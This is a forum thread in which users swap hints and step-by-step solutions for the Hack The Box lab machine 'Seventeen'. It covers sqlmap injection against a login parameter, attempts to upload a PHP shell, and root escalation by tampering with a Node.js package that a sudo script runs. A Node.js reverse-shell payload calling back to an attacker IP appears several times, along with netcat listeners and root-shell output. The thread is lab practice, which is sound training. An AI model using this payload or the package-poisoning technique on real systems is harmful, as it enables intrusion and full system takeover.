Posts: 15 Threads: 0 Joined: N/A (May 30, 2022, 06:38 PM)Exa Wrote: (May 30, 2022, 05:05 PM)hacktheboxer Wrote: (May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
Using sqlmap, I found a valid login.
Could you show your sqlmap request because I have tired with sqlmap fails
My command is 'sqlmap -r sqlmap.txt -p stud_no --level=5 --risk=3' where sqlmap.txt - POST request to server
sqlmap -r r.txt -p stud_no --level 2 --batch
r.txt contains:
POST /vendor/oldmanagement/ HTTP/1.1
Host: seventeen.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://seventeen.htb
Connection: close
Referer: http://seventeen.htb/vendor/oldmanagement/
Cookie: PHPSESSID=1gnir2juq0ktu3bhh3j3egvf03
Upgrade-Insecure-Requests: 1
stud_no=11111&password=secret&login=
I guess the next step is uploading shell file. After uploading file I could not see it in 'School File Management System' and also I have browsed /uploads and other directory but I have not found it. What is the truth? I have 200 code after uploading file Posts: 15 Threads: 0 Joined: N/A (May 28, 2022, 08:14 PM)iamnoone777 Wrote: (May 28, 2022, 08:11 PM)Exa Wrote: There are three folders under http://seventeen.htb/vendor/:
exams
mastermailer
oldmanagement
Thats sound promising I used raft-large-directories.txt and directory-list-2.3-big.txt but I didn't discover oldmanagement and mastermailer How did you find it? Posts: 213 Threads: 0 Joined: N/A (May 31, 2022, 09:34 AM)hacktheboxer Wrote: (May 28, 2022, 08:14 PM)iamnoone777 Wrote: (May 28, 2022, 08:11 PM)Exa Wrote: There are three folders under http://seventeen.htb/vendor/:
exams
mastermailer
oldmanagement
Thats sound promising
I used raft-large-directories.txt and directory-list-2.3-big.txt but I didn't discover oldmanagement and mastermailer
How did you find it? Simply open http://seventeen.htb/vendor/. There is a directory listing. Posts: 26 Threads: 0 Joined: N/A Having problems with root privesc. Tried to edit the /opt/app/node_modules/loglevel/lib/loglevel.js file at the appropriate time. But each time i get write error. (I assume it is because of write permissions). Any suggestions besides try harder...
PS - I am able to capture the loglevel.js file and put my revshell at the top - just cant seem to write it back. Posts: 26 Threads: 0 Joined: N/A (May 31, 2022, 03:31 PM)c0d3r Wrote: Having problems with root privesc. Tried to edit the /opt/app/node_modules/loglevel/lib/loglevel.js file at the appropriate time. But each time i get write error. (I assume it is because of write permissions). Any suggestions besides try harder...
PS - I am able to capture the loglevel.js file and put my revshell at the top - just cant seem to write it back. There is a problem with: kavi@seventeen:~$ vi /opt/app/node_modules/loglevel/lib/loglevel.js
because of this: kavi@seventeen:~$ ll /opt/app/node_modules/loglevel/lib/loglevel.js
-rw-r--r-- 1 root root 9562 Oct 26 1985 /opt/app/node_modules/loglevel/lib/loglevel.js
my workaround is to patch the package before the deployment. By order: spawn two terminal sessions on your host On the first one just start listening on your favorite port nc -nlvp PORT
On the second one ssh [email protected]
kavi@seventeen:~$ cd ~/.npm/loglevel/1.8.0/
kavi@seventeen:~/.npm/loglevel/1.8.0$ mkdir tarball
kavi@seventeen:~/.npm/loglevel/1.8.0$ mv package.tgz tarball/
kavi@seventeen:~/.npm/loglevel/1.8.0$ cd tarball/
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ tar -xvf package.tgz
Now prepare the revshell with the correct IP and PORT (function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
and patch the package kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ vi package/lib/loglevel.js
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ tar cf - package|gzip -f -9>package.tgz
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ mv package.tgz ../
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ cd ../
kavi@seventeen:~/.npm/loglevel/1.8.0$ rm -rf tarball
kavi@seventeen:~/.npm/loglevel/1.8.0$ sudo /opt/app/startup.sh
finally you'll get the rootshell spawned on your nc Listening on [0.0.0.0] (family 0, port 5150)
Connection from 10.129.95.105 44718 received!
id;whoami
uid=0(root) gid=0(root) groups=0(root)
root
Posts: 26 Threads: 0 Joined: N/A Thanks Yondaime316!
That worked great. Posts: 0 Threads: 0 Joined: N/A The SQLI doesnt work anymore, and accessing /files/31234 is unathorized 403. I can upload php shell but cant access...The root mehtod listed here has been patched also. Posts: 129 Threads: 0 Joined: N/A open file ???? (May 30, 2022, 03:13 AM)Himitsu Wrote: (May 30, 2022, 01:54 AM)Peter Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
I dont make to run. a file desapiers. no reverse shell , de code to inject banish. Any tip o idea. please
You need to do this a little bit faster, else loglevel directory will be removed.
Copy this function in memory (Ctrl+c) and replace with your IP and PORT:
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(4000, "10.10.1X.XX", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
1. On Terminal 1, open SSH with kavi user
2. On Terminal 2, open a second SSH with kavi user
then prepare your command (but don't launch because file not yet exist):
vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3:
nc -lvnp 4000
4. On Terminal1:
sudo /opt/app/startup.sh
5. On Terminal 2:
launch your previous command and paste on the TOP your function in step 2
then write and exit (with :x it's more faster)
6. On Terminal1:
quit and re-run sudo /opt/app/startup.sh
7. On Terminal3:
we can see you reverse shell has been triggered:
─$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 sessions SSH for step 4, 5 and 6, that's all.
All explanation from @Dude4695 are enough. cant Posts: 129 Threads: 0 Joined: N/A (May 30, 2022, 03:13 AM)Himitsu Wrote: (May 30, 2022, 01:54 AM)Peter Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
I dont make to run. a file desapiers. no reverse shell , de code to inject banish. Any tip o idea. please
You need to do this a little bit faster, else loglevel directory will be removed.
Copy this function in memory (Ctrl+c) and replace with your IP and PORT:
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(4000, "10.10.1X.XX", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
1. On Terminal 1, open SSH with kavi user
2. On Terminal 2, open a second SSH with kavi user
then prepare your command (but don't launch because file not yet exist):
vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3:
nc -lvnp 4000
4. On Terminal1:
sudo /opt/app/startup.sh
5. On Terminal 2:
launch your previous command and paste on the TOP your function in step 2
then write and exit (with :x it's more faster)
6. On Terminal1:
quit and re-run sudo /opt/app/startup.sh
7. On Terminal3:
we can see you reverse shell has been triggered:
─$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 sessions SSH for step 4, 5 and 6, that's all.
All explanation from @Dude4695 are enough. "/opt/app/node_modules/loglevel/lib/loglevel.js" E212: Can't open file for writing Posts: 28 Threads: 0 Joined: N/A (June 2, 2022, 06:58 AM)sydewayzlocc Wrote: The SQLI doesnt work anymore, and accessing /files/31234 is unathorized 403. I can upload php shell but cant access...The root mehtod listed here has been patched also. yep u are right. its showing 403 for PHP files. i tried with extension bypass but no luck |
